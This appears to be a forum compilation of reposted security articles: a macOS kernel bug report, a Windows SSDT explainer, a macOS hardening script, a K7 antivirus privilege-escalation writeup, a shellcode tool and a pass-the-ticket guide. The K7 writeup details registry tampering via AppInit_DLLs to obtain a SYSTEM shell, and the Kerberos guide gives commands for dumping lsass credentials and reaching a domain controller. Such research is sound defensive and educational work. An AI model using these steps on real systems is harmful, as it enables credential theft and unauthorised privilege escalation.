- It looks like there's an OOB kernel write in the dyld shared cache pager; but AFAICS that isn't reachable unless you've already defeated SIP, so I don't think it's a vulnerability: vm_shared_region_slide_page_v3() is used when a page from the dyld cache is being paged in. It essentially traverses a singly-linked list of relocations inside the page; the offset of the first relocation (iow the offset of the list head) is stored permanently in kernel memory when the shared cache is initialized. As far as I can tell, this function is missing bounds checks; if either the starting offset or the offset stored in the page being paged in points outside the page, a relocation entry will be read from OOB memory, and a relocated address will conditionally be written back to the same address.

- There is a check `rootPath != "/"` in update_dyld_shared_cache; but further up is this:

        // canonicalize rootPath
        if ( !rootPath.empty() ) {
            char resolvedPath[PATH_MAX];
            if ( realpath(rootPath.c_str(), resolvedPath) != NULL ) {
                rootPath = resolvedPath;
            }
            // <rdar://problem/33223984> when building closures for boot volume, pathPrefixes should be empty
            if ( rootPath == "/" ) {
                rootPath = "";
            }
        }

  So as far as I can tell, that condition is always true, which means that when an overlay path is specified with `-overlay`, the cache is written to the root even though the code looks as if the cache is intended to be written to the overlay.

- Some small notes regarding the APFS documentation at <https://developer.apple.com/support/downloads/Apple-File-System-Reference.pdf>:
  - The typedef for apfs_superblock_t is missing.
  - The documentation claims that APFS_TYPE_DIR_REC keys are j_drec_key_t, but actually they can be j_drec_hashed_key_t.
  - The documentation claims that o_cksum is "The Fletcher 64 checksum of the object", but actually APFS requires that the fletcher64 checksum of all data behind the checksum, concatenated with the checksum, is zero. (In other words, you cut out the checksum field at the start, append it at the end, then run fletcher64 over the buffer, and then you have to get an all-zeroes checksum.)
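To make that last note concrete, here is a small sketch of the described verification procedure. The 32-bit word size and 2^32-1 modulus of this fletcher64 variant are my assumptions about the on-disk format, not something stated in the advisory:

    /* Sketch of the APFS object checksum verification described above:
     * move the 8-byte o_cksum from the front of the object to the end,
     * run fletcher64 over the result, and expect zero. */
    #include <stdint.h>
    #include <string.h>

    static uint64_t fletcher64(const uint8_t *buf, size_t len)
    {
        uint64_t sum1 = 0, sum2 = 0;
        for (size_t i = 0; i + 4 <= len; i += 4) {
            uint32_t w;
            memcpy(&w, buf + i, 4);            /* little-endian host assumed */
            sum1 = (sum1 + w) % 0xFFFFFFFFull;
            sum2 = (sum2 + sum1) % 0xFFFFFFFFull;
        }
        return (sum2 << 32) | sum1;
    }

    /* obj points to one on-disk object (e.g. a 4096-byte block) whose
     * first 8 bytes are o_cksum */
    static int apfs_checksum_ok(const uint8_t *obj, size_t len)
    {
        uint8_t tmp[4096];
        if (len < 8 || len > sizeof(tmp) || (len % 4) != 0)
            return 0;
        memcpy(tmp, obj + 8, len - 8);         /* body first...          */
        memcpy(tmp + len - 8, obj, 8);         /* ...checksum appended   */
        return fletcher64(tmp, len) == 0;
    }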
Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47708.zip

Sursa: https://www.exploit-db.com/exploits/47708

6. A Glimpse into SSDT inside Windows x64 Kernel

What is SSDT

The System Service Dispatch Table, or SSDT, is simply an array of addresses of kernel routines on 32-bit operating systems, or an array of relative offsets to the same routines on 64-bit operating systems. The SSDT is the first member of the Service Descriptor Table kernel memory structure, as shown below:

    typedef struct tagSERVICE_DESCRIPTOR_TABLE {
        SYSTEM_SERVICE_TABLE nt;     // effectively a pointer to the Service Dispatch Table (SSDT) itself
        SYSTEM_SERVICE_TABLE win32k;
        SYSTEM_SERVICE_TABLE sst3;   // pointer to a memory address that contains how many routines are defined in the table
        SYSTEM_SERVICE_TABLE sst4;
    } SERVICE_DESCRIPTOR_TABLE;

SSDTs used to be hooked by AVs as well as by rootkits that wanted to hide files, registry keys, network connections, etc. Microsoft introduced PatchGuard on x64 systems to fight SSDT modifications by BSOD'ing the system.

In Human Terms

When a program in user space calls a function, say CreateFile, code execution is eventually transferred to ntdll!NtCreateFile and, via a syscall, to the kernel routine nt!NtCreateFile. A syscall is merely an index into the System Service Dispatch Table (SSDT), which contains an array of pointers (for 32-bit OSes; relative offsets to the Service Dispatch Table for 64-bit OSes) to all critical system APIs like ZwCreateFile, ZwOpenFile and so on. [A simplified diagram showing how offsets in the SSDT KiServiceTable are converted to absolute addresses of the corresponding kernel routines is omitted here.]

Effectively, syscalls and the SSDT (KiServiceTable) work together as a bridge between userland API calls and their corresponding kernel routines, allowing the kernel to know which routine should be executed for a given syscall that originated in user space.

Service Descriptor Table

In WinDBG, we can check the Service Descriptor Table structure KeServiceDescriptorTable as shown below. Note that the first member is recognized as KiServiceTable - this is a pointer to the SSDT itself - the dispatch table (or simply an array) containing all those pointers/offsets:

    0: kd> dps nt!keservicedescriptortable L4
    fffff801`9210b880 fffff801`9203b470 nt!KiServiceTable
    fffff801`9210b888 00000000`00000000
    fffff801`9210b890 00000000`000001ce
    fffff801`9210b898 fffff801`9203bbac nt!KiArgumentTable

Let's try and print out a couple of values from the SSDT:

    0: kd> dd /c1 KiServiceTable L2
    fffff801`9203b470 fd9007c4
    fffff801`9203b474 fcb485c0

As mentioned earlier, on x64, which is what I'm running in my lab, the SSDT contains relative offsets to kernel routines. In order to get the absolute address for a given offset, the following formula needs to be applied:

    RoutineAbsoluteAddress = KiServiceTableAddress + (routineOffset >>> 4)
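The same lookup can be sketched in C as follows (my reconstruction of the arithmetic above; obtaining the KiServiceTable pointer and the routine count is left to the debugger or calling code):

    #include <stdint.h>

    /* Sketch: resolving an SSDT entry on x64. Each 32-bit table entry is a
     * routine offset relative to KiServiceTable whose low 4 bits carry
     * argument-count metadata, hence the sign-preserving shift right by 4
     * (WinDbg's ">>>"). Offsets can be negative relative to the table. */
    uintptr_t ssdt_routine_address(const int32_t *kiServiceTable, uint32_t syscall_index)
    {
        int32_t offset = kiServiceTable[syscall_index];
        return (uintptr_t)kiServiceTable + (offset >> 4);
    }

    /* e.g. ssdt_routine_address(table, 0x55) would yield nt!NtCreateFile,
     * given the table dumped in the WinDbg session above. */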
Using the above formula and the first offset fd9007c4 we got from the KiServiceTable, we can work out that this offset points to nt!NtAccessCheck:

    0: kd> u KiServiceTable + (0xfd9007c4 >>> 4)
    nt!NtAccessCheck:
    fffff801`91dcb4ec 4c8bdc mov r11,rsp
    fffff801`91dcb4ef 4883ec68 sub rsp,68h
    fffff801`91dcb4f3 488b8424a8000000 mov rax,qword ptr [rsp+0A8h]
    fffff801`91dcb4fb 4533d2 xor r10d,r10d

We can confirm it if we disassemble nt!NtAccessCheck directly - the routine address (fffff801`91dcb4ec) and the first instruction (mov r11,rsp) of the above and below commands match:

    0: kd> u nt!NtAccessCheck L1
    nt!NtAccessCheck:
    fffff801`91dcb4ec 4c8bdc mov r11,rsp

If we refer back to the original drawing of how SSDT offsets are converted to absolute addresses, we can redraw it with specific values for syscall 0x1.

Finding a Dispatch Routine for a Given Userland Syscall

As a simple exercise, given a known syscall number, we can try to work out what kernel routine will be called once that syscall is issued. Let's load the debugging symbols for the ntdll module:

    .reload /f ntdll.dll
    lm ntdll

Let's now find the syscall for ntdll!NtCreateFile:

    0: kd> u ntdll!ntcreatefile L2

...we can see the syscall is 0x55. Offsets in the KiServiceTable are 4 bytes in size, so we can work out the offset for syscall 0x55 by looking at the value the KiServiceTable holds at position 0x55:

    0: kd> dd /c1 kiservicetable+4*0x55 L1
    fffff801`9203b5c4 01fa3007

We see from the above that the offset for NtCreateFile is 01fa3007. Using the formula discussed previously for working out the absolute routine address, we confirm that we're looking at the nt!NtCreateFile kernel routine that will be called once ntdll!NtCreateFile issues the 0x55 syscall:

    0: kd> u kiservicetable + (01fa3007>>>4) L1
    nt!NtCreateFile:
    fffff801`92235770 4881ec88000000 sub rsp,88h

Let's redraw the earlier diagram once more for syscall 0x55 and ntdll!NtCreateFile.

Finding Addresses of All SSDT Routines

As another exercise, we could loop through all items in the service dispatch table and print the absolute addresses of all routines defined in it:

    .foreach /ps 1 /pS 1 ( offset {dd /c 1 nt!KiServiceTable L poi(keservicedescriptortable+0x10) }){ dp kiservicetable + ( offset >>> 4 ) L1 }

Nice, but not very human readable. We can update the loop a bit and print out the API names associated with those absolute addresses:

    0: kd> .foreach /ps 1 /pS 1 ( offset {dd /c 1 nt!KiServiceTable L poi(nt!KeServiceDescriptorTable+10)}){ r $t0 = ( offset >>> 4) + nt!KiServiceTable; .printf "%p - %y\n", $t0, $t0 }
    fffff80191dcb4ec - nt!NtAccessCheck (fffff801`91dcb4ec)
    fffff80191cefccc - nt!NtWorkerFactoryWorkerReady (fffff801`91cefccc)
    fffff8019218df1c - nt!NtAcceptConnectPort (fffff801`9218df1c)
    fffff801923f8848 - nt!NtMapUserPhysicalPagesScatter (fffff801`923f8848)
    fffff801921afc10 - nt!NtWaitForSingleObject (fffff801`921afc10)
    fffff80191e54010 - nt!NtCallbackReturn (fffff801`91e54010)
    fffff8019213cf60 - nt!NtReadFile (fffff801`9213cf60)
    fffff801921b2e80 - nt!NtDeviceIoControlFile (fffff801`921b2e80)
    fffff80192212dc0 - nt!NtWriteFile (fffff801`92212dc0)
    ... cut for brevity ...
References

- "The Quest for the SSDTs" - the much talked about kernel data structures - www.codeproject.com
- ".printf - Windows drivers" - the .printf token behaves like the printf statement in C - docs.microsoft.com
- ".foreach - Windows drivers" - the .foreach token parses the output of one or more debugger commands and uses each value in this output as the input to one or more additional commands - docs.microsoft.com

Sursa: https://ired.team/miscellaneous-reversing-forensics/windows-kernel/glimpse-into-ssdt-in-windows-x64-kernel
7. macOS Lockdown (mOSL)

Bash script to audit and fix macOS Catalina (10.15.x) security settings. Inspired by and based on Lockdown by Patrick Wardle and osxlockdown by Scott Piper.

Warnings

- mOSL is being rewritten in Swift and the Bash version will be deprecated. See: "The Future of mOSL".
- Always run the latest release, not the code in master!
- This script will only ever support the latest macOS release.
- This script requires your password to invoke some commands with sudo.

brew tap: 0xmachos/homebrew-mosl

To install mOSL via brew, execute:

    brew tap 0xmachos/homebrew-mosl
    brew install mosl

mOSL will then be available as: Lockdown

Threat Model(ish)

The main goal is to enforce already secure defaults and apply more strict non-default options. It aims to reduce attack surface, but it is pragmatic in this pursuit. The author utilises Bluetooth for services such as Handoff, so it is left enabled. There is no specific focus on enhancing privacy. Finally, mOSL will not protect you from the FSB, MSS, DGSE, or FSM.

Full Disk Access Permission

In macOS Mojave and later, certain application data is protected by the OS. For example, if Example.app wishes to access Contacts.app data, Example.app must be given explicit permission via System Preferences > Security & Privacy > Privacy. However, some application data cannot be accessed via a specific permission; access to this data requires the Full Disk Access permission. mOSL requires that Terminal.app be given the Full Disk Access permission. It needs this permission to audit/fix the following settings:

- disable mail remote content
- disable auto open safe downloads

These are currently the only settings which require Full Disk Access. It is not possible to programmatically get or prompt for this permission; it must be manually given by the user. To give Terminal.app Full Disk Access: System Preferences > Security & Privacy > Privacy > Full Disk Access > Add Terminal.app

Once you are done with mOSL you can revoke Full Disk Access for Terminal.app. There's a small checkbox next to Terminal which you can uncheck to revoke the permission without entirely removing Terminal.app from the list.

More info on macOS's new permission model:

- Working with Mojave's Privacy Protection by Howard Oakley
- TCC Round Up by Carl Ashley
- WWDC 2018 Session 702: Your Apps and the Future of macOS Security

Verification

The executable Lockdown file can be verified with Minisign:

    minisign -Vm Lockdown -P RWTiYbJbLl7q6uQ70l1XCvGExizUgEBNDPH0m/1yMimcsfgh542+RDPU

Install via brew:

    brew install minisign

Usage

    $ ./Lockdown
    Audit or Fix macOS security settings🔒🍎

    Usage: ./Lockdown [list | audit {setting_index} | fix {setting_index} | debug]

      list       - List settings that can be audited/fixed
      audit      - Audit the status of all or chosen setting(s) (does NOT change settings)
      fix        - Attempt to fix all or chosen setting(s) (does change settings)
      fix-force  - Same as 'fix' but bypasses the user confirmation prompt
                   (can be used to invoke Lockdown from other scripts)
      debug      - Print debug info for troubleshooting

Settings

See Commands.md for an easy-to-read list of the commands used to audit/fix the settings below.
Settings that can be audited/fixed:

    [0]  enable automatic system updates
    [1]  enable automatic app store updates
    [2]  enable gatekeeper
    [3]  enable firewall
    [4]  enable admin password preferences
    [5]  enable terminal secure entry
    [6]  enable sip
    [7]  enable filevault
    [8]  disable firewall builtin software
    [9]  disable firewall downloaded signed
    [10] disable ipv6
    [11] disable mail remote content
    [12] disable remote apple events
    [13] disable remote login
    [14] disable auto open safe downloads
    [15] set airdrop contacts only
    [16] set appstore update check daily
    [17] set firmware password
    [18] check kext loading consent
    [19] check efi integrity
    [20] check if standard user
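Putting the usage text and the index list together, a couple of example invocations (nothing beyond what the help output above states is assumed):

    # Audit a single setting by its index from the list above (3 = enable firewall)
    ./Lockdown audit 3

    # Attempt to fix all settings (changes system state; prompts before acting)
    ./Lockdown fix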
Sursa: https://github.com/0xmachos/mOSL

8. Anti-virus Exploitation: Local Privilege Escalation in K7 Security (CVE-2019-16897)

Hey guys, long time no article! Over the past few months, I have been looking into exploitation of anti-viruses via logic bugs. I will briefly discuss the approach towards performing vulnerability research on these security products, using the vulnerability I discovered in K7 Security as an example.

Disclaimer: I do not claim to know everything about vulnerability research or exploitation, so if there are errors in this article, please let me know.

Target Selection

Security products such as anti-viruses are an attractive target (at least for me) because they operate in a trusted and privileged context in both the kernel, as a driver, and userland, as a privileged service. This means that they have the ability to facilitate potential escalation of privilege or otherwise access privileged functionality. They also have a presence in the low-privileged space of the operating system. For example, there may exist a UI component with which the user can interact, sometimes allowing options to be changed such as enabling/disabling the anti-virus, adding directory or file exclusions, and scanning files for malware. Anti-viruses must also access and perform operations on operating system objects to detect malware, such as reading files, registry keys, memory, etc., as well as being able to perform privileged actions to keep the system in a protected state no matter the situation. It is between this trusted, high-privilege space and the untrusted, low-privilege space where interesting things occur.

Attack Surface

As aforementioned, anti-viruses live on both sides of the privilege boundary as shown in the following diagram:

[Diagram: UI and service process on either side of the privilege boundary]

Whatever crosses the line between high and low privilege represents the attack surface. Let's look at how this diagram can be interpreted. The user interface shares common operations with the service process, which is expected. If the user wants to carry out a privileged action, the service will do it on the user's behalf, assuming that security checks are passed. If the user wishes to change a setting, they open the user interface and click a button. This is communicated to the service process via some form of inter-process communication (IPC), which will perform the necessary actions, e.g. the anti-virus stores its configuration in the registry and therefore the service will open the relevant registry key and modify some data. Keep in mind that the registry key is stored in the HKEY_LOCAL_MACHINE hive, which is in high-privilege space, thus requiring a high-privilege process to modify its data. So the user, from low privilege, is able to indirectly modify a high-privilege object.

One more example. A user can scan for malware through the user interface (of course, what good is an anti-virus if it disallows the user from scanning for malware?). A simple, benign operation, what could go wrong? Since it is the responsibility of the service process to perform the malware scan, the interface communicates the information to the service process to target a file. It must interact with the file in order to perform the scan, i.e. it must locate the file on disk and read its content. If, while the file data has been read and is being scanned for malware, the anti-virus does not lock the file on disk, it is possible for the malware to be replaced with a symbolic link pointing to a file in a high-privileged directory (yes, it is possible), let's say notepad.exe. When the scan is completed and the file has been determined to be malware, the service process can delete the file. However, the malware has been replaced with a link to notepad.exe! If the anti-virus does not detect and reject the symbolic link, it will delete notepad.exe without question. This is an example of a Time of Check to Time of Use (TOCTOU) race condition bug. Again, the user, from low privilege, is able to indirectly modify a high-privilege object because the service process acts as a broker.
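For reference, the usual way to make such a deletion race-resistant on Windows is to resolve the path once and then operate purely on the handle. A minimal sketch (my illustration, not code from any AV product):

    #include <windows.h>

    /* Sketch: delete a scanned file via the handle that was checked, instead
     * of re-resolving the path. Opening with FILE_FLAG_OPEN_REPARSE_POINT
     * operates on a planted symlink/reparse point itself rather than
     * following it to its target. */
    BOOL delete_scanned_file(LPCWSTR path)
    {
        HANDLE h = CreateFileW(path, DELETE, FILE_SHARE_READ, NULL, OPEN_EXISTING,
                               FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS,
                               NULL);
        if (h == INVALID_HANDLE_VALUE)
            return FALSE;

        FILE_DISPOSITION_INFO fdi = { TRUE };      /* delete when handle closes */
        BOOL ok = SetFileInformationByHandle(h, FileDispositionInfo,
                                             &fdi, sizeof(fdi));
        CloseHandle(h);
        return ok;
    }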
Exploitation

This vulnerability allows a low-privilege user to modify (almost) arbitrary registry data through the anti-virus's settings. However, a low-privileged user (non-administrator) cannot, or rather should not, be able to change the anti-virus's settings.

Bypassing Administrative Checks

To narrow down how this administration check is performed, procmon can be used to identify operating system activity as the settings page is accessed again. This will trigger the anti-virus to recheck the administrative status of the current user while its interaction with the operating system is being logged. Of course, since we are low privilege and procmon requires high privilege, this is not practical in a real environment. However, because we control the testing environment, we can allow procmon to run as we have access to an administrator account. Setting procmon to filter by K7TSMain as the process name will capture activity performed by the user interface process. When procmon starts to log, attempting to access the settings page again in the UI will trigger procmon to instantly show results:

[Screenshot: procmon admin check]

It can be seen that the anti-virus stores the administrative check in the registry in AdminNonAdminIsValid. Looking at the value in the Event Properties window shows that it returned 0, meaning that non-administrator users are not allowed. But there is a slight problem here. Bonus points if you can spot it.

Now that we know where the check is being performed, the next step is bypassing it. procmon shows that the process is running in low-privilege space, as indicated by the user and the medium integrity level, meaning that we own the process. If it is not protected, we can simply hook the RegQueryValue function and modify the return value.

[Screenshot: attaching to K7TSMain]

Attempting to attach to the K7TSMain.exe process using x32dbg is allowed! A breakpoint on RegQueryValueExA has been set for when we try to access the settings page again.

[Screenshot: triggering the RegQueryValueExA breakpoint]

x32dbg catches the breakpoint when the settings page is clicked. The value name being queried is ProductType, but we want AdminNonAdminIsValid, so continuing on will trigger the next breakpoint:

[Screenshot: breakpoint on AdminNonAdminIsValid]

Now we can see AdminNonAdminIsValid. To modify the return value, we can allow the function to run until return. However, the calling function looks like a wrapper for RegQueryValueExA, so continuing again until return reveals the culprit function that performs the check:

[Screenshot: admin check function]

There is an obvious check there for the value 1; however, the current returned value for the registry data is 0. This decides the return value of this function, so we can either change [esp+4] or change the return value to bypass the check:

[Screenshot: bypassing the admin check]

Intercepting Inter-process Communication

Multiple inter-process communication methods are available on Windows, such as mailslots, file mapping, COM, and named pipes. We must figure out which is implemented in the product to be able to analyse the protocol. An easy way to do this is by using API Monitor to log select function calls made by the process. When we do this and then apply a changed setting, we can see references to named pipe functions:

[Screenshot: API Monitor showing named pipe functions]

Note that the calling module is K7AVOptn.dll instead of K7TSMain.exe.
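API Monitor tells us that the client side drives the service with TransactNamedPipe. In code, such a client transaction looks roughly like the sketch below; the pipe name and request blob are hypothetical placeholders that would have to be recovered from the captures that follow:

    #include <windows.h>
    #include <stdio.h>

    /* Sketch of a client transaction against the settings pipe. The pipe
     * name "\\.\pipe\K7Settings" and the request contents are hypothetical
     * placeholders, not K7's real protocol. */
    int main(void)
    {
        HANDLE pipe = CreateFileW(L"\\\\.\\pipe\\K7Settings",  /* hypothetical */
                                  GENERIC_READ | GENERIC_WRITE,
                                  0, NULL, OPEN_EXISTING, 0, NULL);
        if (pipe == INVALID_HANDLE_VALUE) {
            printf("CreateFileW failed: %lu\n", GetLastError());
            return 1;
        }

        /* TransactNamedPipe requires message-mode reads */
        DWORD mode = PIPE_READMODE_MESSAGE;
        SetNamedPipeHandleState(pipe, &mode, NULL, NULL);

        char request[] = "...captured settings blob...";       /* placeholder */
        char reply[4096];
        DWORD got = 0;
        if (TransactNamedPipe(pipe, request, sizeof(request),
                              reply, sizeof(reply), &got, NULL))
            printf("received %lu reply bytes\n", got);

        CloseHandle(pipe);
        return 0;
    }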
If we have a look at the data being communicated through TransactNamedPipe, we can see some interesting information:

[Screenshot: TransactNamedPipe input buffer]

The first thing that pops out is what looks like a list of extension names (.ocx, .exe, .com) separated with |, where some have wildcard matching. This could be a list of extensions to scan for malware. If we have a look at the registry where the anti-virus stores its configuration, we can see something similar under the value ScanExtensions in the RTFileScanner key:

[Screenshot: ScanExtensions value in the registry]

Continuing down the list of calls, one of them contains some very intriguing data:

[Screenshot: full registry key paths in the pipe data]

It looks as though the anti-virus is applying values by specifying (privileged) registry keys and their values by their full key path. The next obvious step is to see if changing one of the keys and their values will work. This can be done by breakpointing on the TransactNamedPipe function in x32dbg:

[Screenshot: breakpoint on TransactNamedPipe]

Once here, locate the input buffer in the second argument and alter the data to add or change a key in the HKEY_LOCAL_MACHINE hive like so:

[Screenshot: modified input buffer]

If it is possible to change this registry key's values, high-privileged processes will be forced to load the DLLs listed in AppInit_DLLs, i.e. one that we control. The LoadAppInit_DLLs value must also be set to 1 (it is 0 by default) to enable this functionality. The result:

[Screenshot: AppInit_DLLs written under HKLM]

Triggering the Payload

You may have noticed that the registry key resides within Wow6432Node, which is the 32-bit counterpart of the registry. This is because the product is 32-bit and so Windows will automatically redirect its registry changes. On 64-bit Windows, processes are usually 64-bit, so loading the payload DLL through AppInit_DLLs that way is unlikely. A reliable way is to make use of the anti-virus itself, because it is 32-bit, assuming a privileged component can be launched. The easiest way to do this is to restart the machine, because that reloads all of the anti-virus's processes; however, it is not always practical, nor is it clean. Clicking around the UI reveals that the update function runs K7TSHlpr.exe under the NT AUTHORITY\SYSTEM user:

[Screenshot: K7TSHlpr.exe running as NT AUTHORITY\SYSTEM]

As it is a 32-bit application, Windows will load our AppInit_DLLs DLL into the process space.

[Screenshot: payload DLL loaded into K7TSHlpr.exe]
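The DLL itself can be tiny. Here is a minimal sketch of such an AppInit payload; the post only states that system("cmd") was used, so everything else is my reconstruction:

    #include <windows.h>
    #include <stdlib.h>

    /* Minimal AppInit_DLLs payload sketch: any process honoring AppInit_DLLs
     * runs DllMain below on load, so a SYSTEM process such as K7TSHlpr.exe
     * ends up spawning a SYSTEM shell. Illustrative only: heavyweight work
     * under loader lock in DllMain is unsafe, and a real payload would
     * usually hand off to a new thread instead. */
    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
    {
        if (fdwReason == DLL_PROCESS_ATTACH)
            system("cmd");  /* interactive shell in the host process's context */
        return TRUE;
    }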
Using system("cmd") as the payload will prompt the user with an interactive session in the context of the NT AUTHORITY\SYSTEM account via the UI0Detect service. Selecting to view the message brings up the following:

[Screenshot: interactive shell running as NT AUTHORITY\SYSTEM]

We have root!

Automated Exploit

See my GitHub for the advisory and an automated exploit.

Sursa: https://0x00sec.org/t/anti-virus-exploitation-local-privilege-escalation-in-k7-security-cve-2019-16897/17655

9. Sickle
Sickle is a payload development tool originally created to aid me in crafting shellcode, however it can be used in crafting payloads for other exploit types as well (non-binary). Although the current modules are mostly aimed towards assembly, this tool is not limited to shellcode. Sickle can aid in the following:

- Identifying instructions resulting in bad characters when crafting shellcode
- Formatting output in various languages (python, perl, javascript, etc.)
- Accepting bytecode via STDIN and formatting it
- Executing shellcode in both Windows and Linux environments
- Diffing two binaries (hexdump, raw, asm, byte)
- Disassembling shellcode into assembly language (ARM, x86, etc.)
- Shellcode extraction from raw bins (nasm sc.asm -o sc)

Quick failure check

A task I found myself doing repetitively was compiling assembler source code, extracting the shellcode, placing it into a wrapper, and testing it. If it was a bad run, the process would be repeated until successful. Sickle takes care of placing the shellcode into a wrapper for quick testing (works on Windows and Unix systems).

Recreating shellcode

Sometimes you find a piece of shellcode that's fluent in its execution and you want to recreate it yourself to understand its underlying mechanisms. Sickle can help you compare the original shellcode to your "recreated" version. If you're not crafting shellcode and just need two binfiles to be the same, this feature can also help verify that files match byte for byte (multiple modes).

Disassembly

Sickle can also take a binary file and convert the extracted opcodes (shellcode) to machine instructions. Keep in mind this works with raw opcodes (-r) and STDIN (-r -) as well. In the following example I am converting a reverse shell designed by Stephen Fewer to assembly.

Bad character identification

Module Based Design

This tool was originally designed as one big script, however recently when a change needed to be done to the script I had to relearn my own code... In order to avoid this in the future I've decided to keep all modules under the "modules" directory (default module: format). If you prefer the old design, I have kept a copy under the Documentation directory.

    ~# sickle.py -l

    Name           Description
    ----           -----------
    diff           Compare two binaries / shellcode(s). Supports hexdump, byte, raw, and asm modes
    run            Execute shellcode on either windows or unix
    format         Format bytecode into desired format / language
    badchar        Generate bad characters in respective format
    disassemble    Disassemble bytecode in respective architecture
    pinpoint       Pinpoint where in shellcode bad characters occur

    ~# sickle -i -m diff

    Options for diff

    Name       Required    Description
    ----       --------    -----------
    BINFILE    yes         Additional binary file needed to perform diff
    MODE       yes         hexdump, byte, raw, or asm

    Description:
    Compare two binaries / shellcode(s). Supports hexdump, byte, raw, and asm modes

Sursa: https://github.com/wetw0rk/Sickle
10. Practical Guide to Passing Kerberos Tickets From Linux

Nov 21, 2019

The goal of this post is to be a practical guide to passing Kerberos tickets from a Linux host. In general, penetration testers are very familiar with using Mimikatz to obtain cleartext passwords or NT hashes and utilize them for lateral movement. At times we may find ourselves in a situation where we have local admin access to a host, but are unable to obtain either a cleartext password or an NT hash of a target user. Fear not, in many cases we can simply pass a Kerberos ticket in place of passing a hash. This post is meant to be a practical guide; for a deeper understanding of the technical details and theory, see the resources at the end of the post.

Tools

To get started we will first need to set up some tools. All have setup information on their GitHub pages.

- Impacket: https://github.com/SecureAuthCorp/impacket
- pypykatz: https://github.com/skelsec/pypykatz
- Kerberos client - RPM based: yum install krb5-workstation / Debian based: apt install krb5-user
- procdump: https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
- autoProc.py (not required, but useful): wget https://gist.githubusercontent.com/knavesec/0bf192d600ee15f214560ad6280df556/raw/36ff756346ebfc7f9721af8c18dff7d2aaf005ce/autoProc.py

Lab Environment

This guide will use a simple Windows lab with two hosts:

- dc01.winlab.com (domain controller)
- client01.winlab.com (generic server)

And two domain accounts:

- Administrator (domain admin)
- user1 (local admin on client01)

Passing the Ticket

By some prior means we have compromised the account user1, which has local admin access to client01.winlab.com. A standard technique from this position would be to dump passwords and NT hashes with Mimikatz. Instead, we will use a slightly different technique of dumping the memory of the lsass.exe process with procdump64.exe from Sysinternals. This has the advantage of avoiding antivirus without needing a modified version of Mimikatz. This can be done by uploading procdump64.exe to the target host and then running:

    procdump64.exe -accepteula -ma lsass.exe output-file

Alternatively we can use autoProc.py, which automates all of this as well as cleans up the evidence (if using this method, make sure you have placed procdump64.exe in /opt/procdump/; I also prefer to comment out line 107):

    python3 autoProc.py domain/user@target

We now have the lsass.dmp on our attacking host. Next we dump the Kerberos tickets:

    pypykatz lsa -k /kerberos/output/dir minidump lsass.dmp

And view the available tickets. Ideally, we want a krbtgt ticket. A krbtgt ticket allows us to access any service that the account has privileges to; otherwise we are limited to the specific service of the TGS ticket. In this case we have a krbtgt ticket for the Administrator account! The next step is to convert the ticket from .kirbi to .ccache so that we can use it on our Linux host:

    kirbi2ccache input.kirbi output.ccache

Now that the ticket file is in the correct format, we specify the location of the .ccache file by setting the KRB5CCNAME environment variable and use klist to verify everything looks correct:

    export KRB5CCNAME=/path/to/.ccache
    klist

We must specify the target host by the fully qualified domain name. We can either add the host to our /etc/hosts file or point to the DNS server of the Windows environment.
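For example, an /etc/hosts entry for this lab could look like the following; the IP address here is an assumption about the lab layout:

    # /etc/hosts - map the DC's FQDN so Kerberos name resolution works
    192.168.56.10   dc01.winlab.com winlab.com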
Finally, we are ready to use the ticket to gain access to the domain controller:

    wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn

Excellent! We were able to elevate to domain admin by using pass the ticket! Be aware that Kerberos tickets have a set lifetime. Make full use of the ticket before it expires!

Conclusion

Passing the ticket can be a very effective technique when you do not have access to an NT hash or password. Blue teams are increasingly aware of passing the hash. In response they are placing high-value accounts in the Protected Users group or taking other defensive measures. As such, passing the ticket is becoming more and more relevant.

Resources

- https://www.tarlogic.com/en/blog/how-kerberos-works/
- https://www.harmj0y.net/blog/tag/kerberos/

Thanks to the following for providing tools or knowledge:

- Impacket
- gentilkiwi
- harmj0y
- SkelSec
- knavesec

Sursa: https://0xeb-bp.github.io/blog/2019/11/21/practical-guide-pass-the-ticket.html
11. Reverse Engineering iOS Applications

Welcome to my course Reverse Engineering iOS Applications. If you're here it means that you share my interest in application security and exploitation on iOS. Or maybe you just clicked the wrong link 😂

All the vulnerabilities that I'll show you here are real; they've been found in production applications by security researchers, including myself, as part of bug bounty programs or just regular research. One of the reasons why you don't often see writeups with these types of vulnerabilities is that most of the companies prohibit the publication of such content. We've helped these companies by reporting these issues to them and we've been rewarded with bounties for that, but no one other than the researcher(s) and the company's engineering team will learn from those experiences. This is part of the reason I decided to create this course: I built a fake iOS application that contains all the vulnerabilities I've encountered in my own research or in the very few publications from other researchers. Even though there are already some projects[^1] aimed at teaching you common issues in iOS applications, I felt we needed one that showed the kind of vulnerabilities we've seen in applications downloaded from the App Store.

This course is divided into 5 modules that will take you from zero to reversing production applications on the Apple App Store. Every module is intended to explain a single part of the process in a series of step-by-step instructions that should guide you all the way to success.

This is my first attempt at creating an online course, so bear with me if it's not the best. I love feedback, and even if you absolutely hate it, let me know; but hopefully you'll enjoy this ride and you'll get to learn something new. Yes, I'm a n00b!

If you find typos, mistakes or plain wrong concepts please be kind and tell me so that I can fix them and we all get to learn!

Version: 1.1

Modules

- Prerequisites
- Introduction
- Module 1 - Environment Setup
- Module 2 - Decrypting iOS Applications
- Module 3 - Static Analysis
- Module 4 - Dynamic Analysis and Hacking
- Module 5 - Binary Patching
- Final Thoughts
- Resources

EPUB Download

Thanks to natalia-osa's brilliant idea, there's now a .epub version of the course that you can download from here. As Natalia mentioned, this is for easier consumption of the content. Thanks again for this fantastic idea, Natalia 🙏🏼.

License

Copyright 2019 Ivan Rodriguez <ios [at] ivrodriguez.com>

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

